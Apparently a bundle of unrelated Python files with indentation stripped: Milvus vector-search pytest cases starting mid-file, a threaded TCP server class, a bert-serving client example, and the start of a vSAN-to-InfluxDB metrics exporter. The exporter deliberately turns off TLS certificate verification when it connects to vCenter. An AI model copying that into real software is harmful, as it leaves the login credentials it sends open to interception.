top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, **query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
"""
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, **default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
"""
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, **default_query)
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_l2(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
"""
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities,
default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
"""
target: test concurrent search with multi processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, **default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_query_vector_only(self, connect, collection):
"""
target: test search normal scenario
method: search vector only
expected: search status ok, the length of result
"""
init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, **default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L0)
def test_query_empty(self, connect, collection):
"""
method: search with empty query
expected: error raised
"""
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
|
TcpServer.py
|
from socketserver import ThreadingTCPServer
from .message import TcpMessage
from .message import TcpRequest
from ._RequestHandler import _RequestHandler
from threading import Thread, Lock
from typing import Callable, List
class TcpServer(ThreadingTCPServer):
"""
A threaded TCP server that listens for :class:`TcpRequests <.TcpRequest>`
and returns :class:`TcpMessages <.TcpMessage>` based on user-defined request
handlers
"""
#: See :py:attr:`socketserver.BaseServer.allow_reuse_address`.
allow_reuse_address = True
#: Number of seconds to wait for a client to send data before closing
#: the connection
_TIMEOUT = 3
_LISTENER_TYPE = Callable[[TcpRequest, TcpMessage], bool]
def __init__(self, port, address="0.0.0.0", timeout=_TIMEOUT):
"""
:param port: The port to listen on
:param address: The ip address to listen on
:param timeout: Seconds to wait for an existing client
to send a request before closing the connection
:type port: int
:type address: str
:type timeout: int
"""
super().__init__((address, port), _RequestHandler)
self._main_thread = None
self._client_timeout = timeout
self._request_handlers = list()
self._thread_lock = Lock()
self._is_running = False
def get_timeout(self) -> int:
"""
:return: The configured session timeout
:rtype: int
"""
return self._client_timeout
def is_running(self) -> bool:
"""
:return: Whether stop() has been called on the server
:rtype: bool
"""
return self._is_running
def start(self):
"""
Starts the server in a background thread
"""
self._is_running = True
self._main_thread = Thread(target=self.serve_forever, daemon=False)
self._main_thread.start()
def stop(self):
"""
Stops the server's background thread
"""
with self._thread_lock:
self._is_running = False
self.shutdown()
self._main_thread.join()
def wait(self):
"""
Waits for the server to stop. Can be used to bring the server's main
background thread to the foreground.
"""
try:
self._main_thread.join()
except KeyboardInterrupt:
self.stop()
def add_request_handler(self, listener: _LISTENER_TYPE):
"""
Adds a request handler to the server. Request handlers will be called
in order and passed (request: TcpRequest, response: TcpMessage).
After all request handlers have been called, the response is sent to
the client.
:param listener: A request handler function that manipulates an incoming
request/response pair
:type listener: Callable[[TcpRequest, TcpMessage], bool]
.. code-block:: python3
def no_op(tcp_req_obj, tcp_msg_obj):
assert isinstance(tcp_req_obj, TcpRequest)
assert isinstance(tcp_msg_obj, TcpMessage)
return True
"""
self._request_handlers.append(listener)
def get_request_handlers(self) -> List[_LISTENER_TYPE]:
"""
:return: The list of request handlers for this server
:rtype: List[Callable[[TcpRequest, TcpResponse], bool]]
"""
return self._request_handlers
|
example3.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
# NOTE: First install bert-as-service via
# $
# $ pip install bert-serving-server
# $ pip install bert-serving-client
# $
# using BertClient in multicast way
import sys
import threading
from model_serving.client import bert_client
def client_clone(id, idx):
bc = bert_client(port=int(sys.argv[1]), port_out=int(sys.argv[2]), identity=id)
for j in bc.fetch():
print('clone-client-%d: received %d x %d' % (idx, j.shape[0], j.shape[1]))
if __name__ == '__main__':
bc = bert_client(port=int(sys.argv[1]), port_out=int(sys.argv[2]))
# start two cloned clients sharing the same identity as bc
for j in range(2):
t = threading.Thread(target=client_clone, args=(bc.identity, j))
t.start()
with open('README.md') as fp:
data = [v for v in fp if v.strip()]
for _ in range(3):
vec = bc.encode(data)
print('bc received %d x %d' % (vec.shape[0], vec.shape[1]))
|
vsanmetrics.py
|
#!/usr/bin/env python
# Erwan Quelin - erwan.quelin@gmail.com
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import VmomiSupport, SoapStubAdapter, vim, vmodl
import threading
import argparse
import atexit
import getpass
from datetime import datetime, timedelta
import time
import ssl
import pickle
import os
import vsanapiutils
import vsanmgmtObjects
def get_args():
parser = argparse.ArgumentParser(
description='Export vSAN cluster performance and storage usage statistics to InfluxDB line protocol')
parser.add_argument('-s', '--vcenter',
required=True,
action='store',
help='Remote vcenter to connect to')
parser.add_argument('-o', '--port',
type=int,
default=443,
action='store',
help='Port to connect on')
parser.add_argument('-u', '--user',
required=True,
action='store',
help='User name to use when connecting to vcenter')
parser.add_argument('-p', '--password',
required=False,
action='store',
help='Password to use when connecting to vcenter')
parser.add_argument('-c', '--cluster_name',
dest='clusterName',
required=True,
help='Cluster Name')
parser.add_argument("--performance",
help="Output performance metrics",
action="store_true")
parser.add_argument("--capacity",
help="Output storage usage metrics",
action="store_true")
parser.add_argument("--health",
help="Output cluster health status",
action="store_true")
parser.add_argument('--skipentitytypes',
required=False,
action='store',
help='List of entity types to skip. Separated by a comma')
parser.add_argument('--cachefolder',
default='.',
required=False,
action='store',
help='Folder where the cache files are stored')
parser.add_argument('--cacheTTL',
type=int,
default=60,
required=False,
action='store',
help='TTL of the object inventory cache')
args = parser.parse_args()
if not args.password:
args.password = getpass.getpass(
prompt='Enter password for host %s and user %s: ' %
(args.vcenter, args.user))
if not args.performance and args.skipentitytypes:
print("You can't skip a performance entity type if you don't provide the --performance tag")
exit()
if not args.performance and not args.capacity and not args.health:
print('Please provide tag(s) --performance and/or --capacity and/or --health to specify what type of data you want to collect')
exit()
return args
def connectvCenter(args):
# Don't check for valid certificate
context = ssl._create_unverified_context()
# Connect to vCenter
try:
si = SmartConnect(host=args.vcenter,
user=args.user,
pwd=args.password,
port=int(args.port),
sslContext=context)
if not si:
raise Exception("Could not connect to the specified host using specified username and password")
except vmodl.MethodFault as e:
raise Exception("Caught vmodl fault : " + e.msg)
except Exception as e:
raise Exception("Caught exception : " + str(e))
# Get content informations
content = si.RetrieveContent()
# Get Info about cluster
cluster_obj = getClusterInstance(args.clusterName, content)
# Exit if the cluster provided in the arguments is not available
if not cluster_obj:
raise Exception('Inventory exception: Did not find the required cluster')
# Disconnect to vcenter at the end
atexit.register(Disconnect, si)
apiVersion = vsanapiutils.GetLatestVmodlVersion(args.vcenter)
vcMos = vsanapiutils.GetVsanVcMos(si._stub, context=context, version=apiVersion)
vsanClusterConfigSystem = vcMos['vsan-cluster-config-system']
try:
clusterConfig = vsanClusterConfigSystem.VsanClusterGetConfig(
cluster=cluster_obj
)
except vmodl.fault.InvalidState as e:
raise Exception("InvalidState exception: " + e.msg())
except vmodl.fault.RuntimeFault as e:
raise Exception("RuntimeFault exception: " + e.msg())
if not clusterConfig.enabled:
raise Exception("Configuration exeption: vSAN is not enabled on cluster " + args.clusterName)
return si, content, cluster_obj, vcMos
# Get cluster informations
def getClusterInstance(clusterName, content):
container = content.rootFolder
viewType = [vim.ClusterComputeResource]
recursive = True
containerView = content.viewManager.CreateContainerView(container, viewType, recursive)
clusters = containerView.view
nbClusterWithSameName = 0
for cluster in clusters:
if cluster.name == clusterName:
nbClusterWithSameName += 1
cluster_obj = cluster
if nbClusterWithSameName == 1:
return cluster_obj
if nbClusterWithSameName > 1:
raise Exception("There is more than one cluster with the name " + clusterName)
return None
def getInformations(witnessHosts, cluster, si):
uuid = {}
hostnames = {}
disks = {}
# Get Host and disks informations
for host in cluster.host:
# Get relationship between host id and hostname
hostnames[host.summary.host] = host.summary.config.name
# Get all disk (cache and capcity) attached to hosts in the cluster
diskAll = host.configManager.vsanSystem.QueryDisksForVsan()
for disk in diskAll:
if disk.state == 'inUse':
uuid[disk.vsanUuid] = disk.disk.canonicalName
disks[disk.vsanUuid] = host.summary.config.name
for vsanHostConfig in cluster.configurationEx.vsanHostConfig:
uuid[vsanHostConfig.clusterInfo.nodeUuid] = hostnames[vsanHostConfig.hostSystem]
# Get witness disks informations
for witnessHost in witnessHosts:
host = (vim.HostSystem(witnessHost.host._moId, si._stub))
uuid[witnessHost.nodeUuid] = host.name
diskWitness = host.configManager.vsanSystem.QueryDisksForVsan()
for disk in diskWitness:
if disk.state == 'inUse':
uuid[disk.vsanUuid] = disk.disk.canonicalName
disks[disk.vsanUuid] = host.name
return uuid, disks
# Get all VM managed by the hosts in the cluster, return array with name and uuid of the VMs
# Source: https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/getvmsbycluster.py
def getVMs(cluster):
vms = {}
for host in cluster.host: # Iterate through Hosts in the Cluster
for vm in host.vm: # Iterate through each VM on the host
vmname = vm.summary.config.name
# Check for white space in VM's name, and replace with escape characters
vmname = "\ ".join(vmname.split())
vms[vm.summary.config.instanceUuid] = vmname
return vms
# Output data in the Influx Line protocol format
def printInfluxLineProtocol(measurement, tags, fields, timestamp):
result = "%s,%s %s %i" % (measurement, arrayToString(tags), arrayToString(fields), timestamp)
print(result)
# Output data in the Influx Line protocol format
def formatInfluxLineProtocol(measurement, tags, fields, timestamp):
result = "%s,%s %s %i \n" % (measurement, arrayToString(tags), arrayToString(fields), timestamp)
return result
# Convert time in string format to epoch timestamp (nanosecond)
def convertStrToTimestamp(str):
sec = time.mktime(datetime.strptime(str, "%Y-%m-%d %H:%M:%S").timetuple())
ns = int(sec * 1000000000)
return ns
# parse EntytyRefID, convert to tags
def parseEntityRefId(measurement, entityRefId, uuid, vms, disks):
tags = {}
if measurement == 'vscsi':
entityRefId = entityRefId.split("|")
split = entityRefId[0].split(":")
tags['uuid'] = split[1]
tags['vscsi'] = entityRefId[1]
tags['vmname'] = vms[split[1]]
else:
entityRefId = entityRefId.split(":")
if measurement == 'cluster-domclient':
tags['uuid'] = entityRefId[1]
if measurement == 'cluster-domcompmgr':
tags['uuid'] = entityRefId[1]
if measurement == 'host-domclient':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'host-domcompmgr':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'cache-disk':
tags['uuid'] = entityRefId[1]
tags['naa'] = uuid[entityRefId[1]]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'capacity-disk':
tags['uuid'] = entityRefId[1]
tags['naa'] = uuid[entityRefId[1]]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'disk-group':
tags['uuid'] = entityRefId[1]
tags['hostname'] = disks[entityRefId[1]]
if measurement == 'virtual-machine':
tags['uuid'] = entityRefId[1]
tags['vmname'] = vms[entityRefId[1]]
if measurement == 'virtual-disk':
split = entityRefId[1].split("/")
tags['uuid'] = split[0]
tags['disk'] = split[1].replace(" ", "\ ")
if measurement == 'vsan-vnic-net':
split = entityRefId[1].split("|")
tags['uuid'] = split[0]
tags['hostname'] = uuid[split[0]]
tags['stack'] = split[1]
tags['vmk'] = split[2]
if measurement == 'vsan-host-net':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'vsan-pnic-net':
split = entityRefId[1].split("|")
tags['uuid'] = split[0]
tags['hostname'] = uuid[split[0]]
tags['vmnic'] = split[1]
if measurement == 'vsan-iscsi-host':
tags['uuid'] = entityRefId[1]
tags['hostname'] = uuid[entityRefId[1]]
if measurement == 'vsan-iscsi-target':
tags['target'] = entityRefId[1]
if measurement == 'vsan-iscsi-lun':
split = entityRefId[1].split("|")
tags['target'] = split[0]
tags['lunid'] = split[1]
return tags
# Convert array to a string compatible with influxdb line protocol tags or fields
def arrayToString(data):
i = 0
result = ""
for key, val in data.items():
if i == 0:
result = "%s=%s" % (key, val)
else:
result = result + ",%s=%s" % (key, val)
i = i + 1
return result
def parseVsanObjectSpaceSummary(data):
fields = {}
fields['overheadB'] = data.overheadB
fields['overReservedB'] = data.overReservedB
fields['physicalUsedB'] = data.physicalUsedB
fields['primaryCapacityB'] = data.primaryCapacityB
fields['reservedCapacityB'] = data.reservedCapacityB
fields['temporaryOverheadB'] = data.temporaryOverheadB
fields['usedB'] = data.usedB
if data.provisionCapacityB:
fields['provisionCapacityB'] = data.provisionCapacityB
return fields
def parseVimVsanDataEfficiencyCapacityState(data):
fields = {}
fields['dedupMetadataSize'] = data.dedupMetadataSize
fields['logicalCapacity'] = data.logicalCapacity
fields['logicalCapacityUsed'] = data.logicalCapacityUsed
fields['physicalCapacity'] = data.physicalCapacity
fields['physicalCapacityUsed'] = data.physicalCapacityUsed
fields['ratio'] = float(data.logicalCapacityUsed) / float(data.physicalCapacityUsed)
return fields
def parseCapacity(scope, data, tagsbase, timestamp):
tags = {}
fields = {}
tags['scope'] = scope
tags.update(tagsbase)
measurement = 'capacity_' + scope
if scope == 'global':
fields['freeCapacityB'] = data.freeCapacityB
fields['totalCapacityB'] = data.totalCapacityB
elif scope == 'summary':
fields = parseVsanObjectSpaceSummary(data.spaceOverview)
elif scope == 'efficientcapacity':
fields = parseVimVsanDataEfficiencyCapacityState(data.efficientCapacity)
else:
fields = parseVsanObjectSpaceSummary(data)
